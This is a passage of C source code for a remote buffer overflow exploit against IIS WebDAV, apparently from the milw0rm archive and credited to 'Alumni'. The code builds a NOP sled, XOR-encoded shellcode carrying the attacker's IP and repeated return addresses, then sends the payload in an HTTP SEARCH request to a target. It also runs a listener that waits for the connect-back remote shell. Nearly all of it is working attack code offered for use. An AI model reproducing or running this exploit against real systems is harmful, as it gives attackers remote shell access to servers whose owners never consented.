(slisten!=INVALID_SOCKET) { saddrin.sin_addr.s_addr = INADDR_ANY; saddrin.sin_family = AF_INET; saddrin.sin_port = htons(DEFPORT); bind(slisten,(struct sockaddr*)&saddrin,sizeof(saddrin)); listen(slisten,5); while (1) { ln1 = sizeof(saddrin); sacc = accept(slisten,(struct sockaddr*) &saddrin,&ln1); if (sacc!=INVALID_SOCKET) { printf("\n\nShell succesfully spawned on remote host\nNetcat to %d",DEFPORT); ExitProcess(0); } } } return (1); } ULONG SendRequest (char* sHost, int iPort) { char* buffsend; struct sockaddr_in saddr_in; int timeout; unsigned long sock; buffsend = (char*)malloc(buffsize+256); memset(buffsend,0,buffsize+256); sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); saddr_in.sin_addr.s_addr = inet_addr(sHost); saddr_in.sin_family = AF_INET; saddr_in.sin_port = htons(iPort); if (!connect(sock,(struct sockaddr*)&saddr_in,sizeof(saddr_in))) { timeout = 5000; setsockopt(sock,SOL_SOCKET,SO_RCVTIMEO,(char*) &timeout,sizeof(timeout)); setsockopt(sock,SOL_SOCKET,SO_SNDTIMEO,(char*) &timeout,sizeof(timeout)); sprintf(buffsend,"SEARCH / HTTP/1.1\r\nHost:%s\r\nContent- Type: text/xml\r\nContent-Length: %d\r\n\r\n%s%s",strlen(xmlbody)+strlen (buffer),xmlbody,buffer); send (sock,buffsend,strlen(buffsend),0); closesocket(sock); } else return(1); return (0); } void dispUsage(char* str1) { printf ("IIS WebDAV exploit by Alumni - The Matrix Reloaded -\n"); printf ("Usage: %s <ipv4dot> <port> [<buffsize>] [<retaddr>] \n\n",str1); return; } int main(int argc, char** argv) { unsigned long uThread; int prologuelen = 0, i; char xorkey = 0; long *ptr1; WSADATA wsadata; WSAStartup(MAKEWORD(2,0),&wsadata); buffsize = BUFFERLEN; retaddr = RET; #ifndef DEBUGGEE_FLOW if (argc<3) { dispUsage(argv[0]); return (1); } if (argc>=4) buffsize = atoi(argv[3]); if (argc>=5) retaddr = atol(argv[4]); #endif buffer = (char*) malloc(buffsize+1); ptr1 = (long*)buffer; memset(buffer,0,buffsize); CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE) AcceptThread,NULL,NULL,&uThread); *(long*)(shellcode+GMHOFF) = GMH; *(long*)(shellcode+GPAOFF) = GPA; *(long*)(shellcode+IPOFF) = getlocalhostip(); for (i=0;i<256;i++) { int iBool = 1, j; for (j=0;j<SHELLCODELEN;j++) if ((shellcode[j]^i)==0 || (shellcode[j]^i)==0x0d || (shellcode[j]^i)==0x0a) iBool = 0; if (iBool) { xorkey = i; break; } } for (i=0;i<SHELLCODELEN;i++) shellcode[i] ^= xorkey; for (i=0;i<(buffsize-SHELLCODELEN)/2;i++) buffer[i] = NOP; prologue[XOROFF] = xorkey; *(short int*)(prologue+SOFF) = SHELLCODELEN; strncat(buffer,prologue,buffsize); prologuelen = strlen(buffer); for (i=prologuelen;i<SHELLCODELEN+prologuelen;i++) buffer[i] = shellcode[i-prologuelen]; prologuelen = strlen(buffer); buffer[prologuelen] = NOP; buffer[prologuelen+1] = NOP; buffer[prologuelen+2] = NOP; buffer[prologuelen+3] = NOP; for (i=(prologuelen+3) & (~3);i<buffsize;i+=sizeof(retaddr)) * (long*)(buffer+i) = retaddr; buffer[buffsize] = 0; printf ("%s",buffer); #ifdef DEBUGGEE_FLOW __asm { mov eax, ptr1 call eax } #else SendRequest(argv[1],atoi(argv[2])); #endif WSACleanup(); return (0); } // milw0rm.com [2003-06-01]